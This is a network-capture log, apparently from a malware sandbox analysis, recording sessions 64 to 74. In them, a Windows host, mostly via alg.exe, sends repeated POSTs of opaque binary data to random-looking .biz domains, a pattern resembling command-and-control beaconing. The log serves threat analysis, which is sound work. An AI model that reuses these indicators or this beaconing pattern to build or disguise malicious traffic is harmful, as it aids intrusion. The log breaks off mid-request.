Nov 18, 2024 09:58:53.877773046 CET | 356 | OUT | POST /dqqtqvvcpfgtdct HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:58:53.879940987 CET | 778 | OUT | Data Raw: 16 c7 13 47 d1 6d de ec fe 02 00 00 b3 a6 b3 d9 89 a6 53 f4 d5 e6 80 34 a1 98 c8 18 e8 81 2b f5 bc f6 e4 fc cf 9f 50 4e 31 ac cc 47 cb 1e 23 63 23 e8 83 2a d2 bc f7 e2 64 fb 8e ec 4b 46 4b d6 58 67 fd 59 b5 a4 63 29 07 0a 8b 2d 8d 25 59 8b 2d 08
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: GmS4+PN1G#c#*dKFKXgYc)-%Y-A/5^_/L'6nOQ_]I"vu5FXM_P3lx'-J,5G1&~MQ2m55}Lt y+-..s,gl*/70RUB_XN;%
Nov 18, 2024 09:58:54.716578960 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=daeaccf0ff0398d1563246b66cb15ad3|155.94.241.187|1731920334|1731920334|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.10 | 50043 | 3.94.10.34 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:55.053132057 CET | 351 | OUT | POST /wpbyxw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:58:55.053148031 CET | 778 | OUT | Data Raw: 86 85 94 f8 09 4c 8e 54 fe 02 00 00 2c 2d 93 f2 27 e1 bc f2 cd b0 f5 c0 20 f6 4c c4 a8 fb 46 68 59 26 ea eb f9 48 eb e1 e9 f0 9d bd 86 4f 69 c4 46 d8 b5 c8 d4 71 47 9d 11 d9 d7 d2 ce d7 5b 83 31 1f 0f 17 db 24 34 93 4b a4 30 e8 0f 79 d2 26 cf 63
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: LT,-' LFhY&HOiFqG[1$4K0y&c`p5I>nd>f0J<PCfEAR3NScu-+xp#(KjR)V+P<8P!Bxa7Lyf>AO|6=$sU/@ZPHfa#S<$
Nov 18, 2024 09:58:55.726326942 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=155cb44b0bb969033128f32de1151ae4|155.94.241.187|1731920335|1731920335|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.10 | 50044 | 18.246.231.120 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:55.988648891 CET | 346 | OUT | POST /axu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:58:55.988667011 CET | 778 | OUT | Data Raw: 94 fb df 5e 0e 64 5f ea fe 02 00 00 86 38 dc ae ca 36 d5 64 d4 1f c2 59 a2 6e 92 8c 98 16 3b 82 52 f2 de 6a dd 5d 8e c0 0f d6 fa ae 84 3c bf 05 c8 2e 0d 44 fd 54 23 1e 76 ae 19 7a 09 15 4b 94 5b b8 a9 47 e6 6f 1e d7 38 39 d2 1d cd 2e 75 b4 bf 66
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ^d_86dYn;Rj]<.DT#vzK[Go89.uf.M;2!.lyzu1yc o4S|Yf`m}\MQda%38`9:`i/1'5SeJZMqwkak(#[,!omz}L@9KS4
Nov 18, 2024 09:58:56.823385000 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=8f3c702e9897b1c8a7cd9eca51a1a22a|155.94.241.187|1731920336|1731920336|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
66 | 192.168.2.10 | 50045 | 47.129.31.212 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:56.217983007 CET | 358 | OUT | POST /dlnxocdhcatvbeh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xlfhhhm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 18, 2024 09:58:56.218007088 CET | 834 | OUT | Data Raw: 1e 58 ba 54 77 ad db d3 36 03 00 00 9a 85 19 8c 1f 86 99 16 c8 10 d4 e3 6d 1e 3e 91 62 5a dc 74 40 3a 04 62 51 4f 9e cf 29 30 95 9a 0f 10 af cc 51 cb 7f 3c a2 88 c2 90 35 46 84 e9 26 80 f0 fb 59 72 0b df 00 34 b8 47 e3 49 56 f1 9d 20 73 e8 47 dd
Data Ascii: XTw6m>bZt@:bQO)0Q<5F&Yr4GIV sG>Pas!P+BMYC<1Dm_jmR& 4=SyQ88%r&;lbzlP=)xK%A)_5BP2~Tk8Cv
Nov 18, 2024 09:58:57.715383053 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=203cdacf23e73c8f1cdfe762b222d9fa|155.94.241.187|1731920337|1731920337|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.10 | 50046 | 3.254.94.185 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:57.045732975 CET | 345 | OUT | POST /ynbq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: brsua.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:57.045758963 CET | 778 | OUT | Data Raw: 6c 7a a2 64 dc ea 4f a7 fe 02 00 00 ef a8 9e 4f 19 b6 27 81 51 25 18 3e aa 5c 68 05 a8 1e 19 e0 c4 0d 30 75 fd e7 29 2b f2 95 d8 74 b5 74 fe 41 20 e7 d6 4d 19 cc 41 4b e7 c8 75 ed fa c2 25 d2 fa 38 32 be c9 83 74 a5 57 15 3a 5e 31 bc 60 97 80 f6
Data Ascii: lzdOO'Q%>\h0u)+ttA MAKu%82tW:^1``cFp!j?8G]oNp2zmM7O-Y??!B$k"<u{?8CA_kb>Z+nzBg04h]Jy^_L}<KcK.
Nov 18, 2024 09:58:58.013690948 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4fed6593e393e5c5221c826fd618a24b|155.94.241.187|1731920337|1731920337|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
68 | 192.168.2.10 | 50047 | 13.251.16.150 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:57.740025997 CET | 348 | OUT | POST /qcmhkl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ifsaia.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 18, 2024 09:58:57.740039110 CET | 834 | OUT | Data Raw: a9 d6 a1 38 bf b3 ee ea 36 03 00 00 41 32 44 fe b8 c8 c5 c5 59 fc 50 ac 2d a1 21 6e b0 93 b9 6b d6 96 57 7a 42 ad 09 6b 2b a6 e7 94 33 fa 40 01 75 d6 98 76 f7 a9 52 19 a9 aa d9 d7 45 10 96 7b 82 35 b0 a7 06 ec 02 be 1b 93 db 4b 70 0f 47 ca 4c 12
Data Ascii: 86A2DYP-!nkWzBk+3@uvRE{5KpGLI\uTUe>QD0yAF(#:<re9o[rkoZzu7;V!GZ)f[,O|x;!wbTcV.R9y"$<QBEio
Nov 18, 2024 09:58:59.202399969 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b0f349f81206c7cfa684db4fc971761a|155.94.241.187|1731920338|1731920338|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        69192.168.2.105004885.214.228.140807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:58.360749006 CET352OUTPOST /jsgrpxea HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:58:58.361597061 CET | 778 | OUT | Data Raw: 74 76 e0 be 7e 22 c0 b9 fe 02 00 00 5e 67 f9 e1 56 b7 41 83 98 99 98 9c 51 1b e8 39 63 6e 76 a8 a6 6f 3f 6e 2b 48 00 5d c1 fd 8f 45 87 14 82 0f fa e5 3e 3a c1 e2 5a 6f 72 9e ee 5d 4a c8 67 ce fd e0 76 07 c0 3b 05 a2 d2 21 26 1b 8b 89 ca d9 47 d4
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: tv~"^gVAQ9cnvo?n+H]E>:Zor]Jgv;!&G;CMF"vNQqU%U0Kz"H<]]SePVWqMb-(WKY;tFg*\FV]Ydk[R^+Ek)C3Os{=#
Nov 18, 2024 09:58:59.236730099 CET | 176 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 19
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 404 page not found
Nov 18, 2024 09:58:59.312644005 CET | 345 | OUT | POST /j HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:58:59.315334082 CET | 778 | OUT | Data Raw: d0 dc 8e 26 c4 6b dd 87 fe 02 00 00 e0 12 73 29 91 3d fe 81 e2 4a 85 04 6c eb 4e 56 ef 01 92 31 c0 2d 85 34 3a 24 86 0d 5d 36 3a 9d 38 5a 07 93 dd a0 6a 98 d4 7c cc 7c 24 f7 b6 d6 33 d9 3b 0a cf 4f be c6 52 82 45 71 5e ab c1 94 90 a0 f5 32 0f a7
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: &ks)=JlNV1-4:$]6:8Zj||$3;OREq^2$s:cQD,6/6bx[M]p99_DZH\GvXO(|(Kr4HdP/1_r (ES}edRT%0z5=zjY


Session ID | Source IP | Source Port | Destination IP | Destination Port
70 | 192.168.2.10 | 50049 | 44.221.84.105 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:59.225713968 CET | 349 | OUT | POST /kvae HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:58:59.225785017 CET | 834 | OUT | Data Raw: 97 02 ff 3e 0c 76 6c de 36 03 00 00 1d 2f 53 da 87 c3 40 68 da f0 30 0b 55 64 d4 a7 8a fe 26 1b 0a 92 c8 06 26 46 5d 62 51 40 a6 a5 5a 8e 71 4e 87 39 09 b0 c3 78 e3 14 29 5b f9 3f 0f 65 2e f3 d9 f0 03 07 82 d9 ad e8 79 4c aa 20 22 3d 84 68 fa 30
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: >vl6/S@h0Ud&&F]bQ@ZqN9x)[?e.yL "=h0S104Rx@mV`pH|dGw0DmGS?h7t'^O%oG;UAw=?_C:L5EW(RTuce,))]JjSxe
Nov 18, 2024 09:58:59.890085936 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d501510c2ce0a5afc843090e9545a464|155.94.241.187|1731920339|1731920339|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.10 | 50050 | 47.129.31.212 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:59.626430035 CET | 354 | OUT | POST /eiatwbrknxj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:58:59.626458883 CET | 778 | OUT | Data Raw: 2e 83 bc 18 de 28 e4 93 fe 02 00 00 82 c2 b6 60 43 9d 57 f5 fd 82 bd ff a6 ca 48 0e 47 1e 9d 1d a5 d2 86 5c 38 6d 0c 28 30 97 08 99 29 87 5c b3 30 2f cd 0a 35 05 95 d5 06 ec 2d aa 91 a4 14 3e 4d 16 fa ee 83 f2 ef 89 67 99 36 b5 b9 e6 ec 4f c0 f6
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .(`CWHG\8m(0)\0/5->Mg6O=C(?1IlV%pzNFbf3t>XdG| n>~7&px@=R8hr9n'{PuJbniK<]U8yjE=OIf{r+#<
Nov 18, 2024 09:59:01.100198030 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=f7dc6ef8b137a31606d58abae93d6644|155.94.241.187|1731920340|1731920340|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
72 | 192.168.2.10 | 50051 | 18.141.10.107 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:59.911279917 CET | 353 | OUT | POST /vuubmwkijd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:58:59.911292076 CET | 834 | OUT | Data Raw: 29 93 72 71 ce 20 9b c5 36 03 00 00 86 51 1f 4f e5 87 0d 91 06 9e ec 88 d6 50 10 56 d0 2d c5 3f 00 c6 3f a5 d4 5a 74 9e 63 f4 d6 d9 86 88 b1 91 9a 45 49 58 ca cd 64 81 7d e4 f9 c9 37 72 29 ac 50 f9 e3 ed e3 e2 37 e0 49 45 b2 33 55 6c d9 41 8a 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: )rq 6QOPV-??ZtcEIXd}7r)P7IE3UlA,V"6`dUYg<-_<S_~xV)=|z+Jd^-XR+wNX|<dPA/I/Mq(:P:g"J,X.f?GN%
Nov 18, 2024 09:59:01.379692078 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=dbeff27eb7f9f912f54e047181f45a0d|155.94.241.187|1731920341|1731920341|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.10 | 50052 | 34.211.97.45 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:01.272531033 CET | 351 | OUT | POST /bbriddytwq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:59:01.272566080 CET | 778 | OUT | Data Raw: 65 e5 72 92 0c 80 29 12 fe 02 00 00 06 99 42 8b 95 5d 9c fb ad 9b 82 b9 e6 37 87 e0 88 13 7d c9 97 69 97 a6 16 1d ef 4d 1d 16 93 68 2d 8a 75 07 53 d3 e6 09 0c 6f d8 f4 34 12 9b 92 9d f8 32 8a 59 fc b9 15 6d c1 65 ed 4e e7 ec b8 4b 46 96 7d 2e 31
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: er)B]7}iMh-uSo42YmeNKF}.1FU;BH2Zg\Vpww|W@W|NMu$+x&<1vmrkq#{&WIT4BXs]V}>gQ~>gic+{Yztb]L]`
Nov 18, 2024 09:59:02.110693932 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=7a7213a1b199deb3c6a7a51963daf4fc|155.94.241.187|1731920341|1731920341|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
74 | 192.168.2.10 | 50053 | 172.234.222.138 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:01.401707888 CET | 354 | OUT | POST /yeeqryklqchag HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
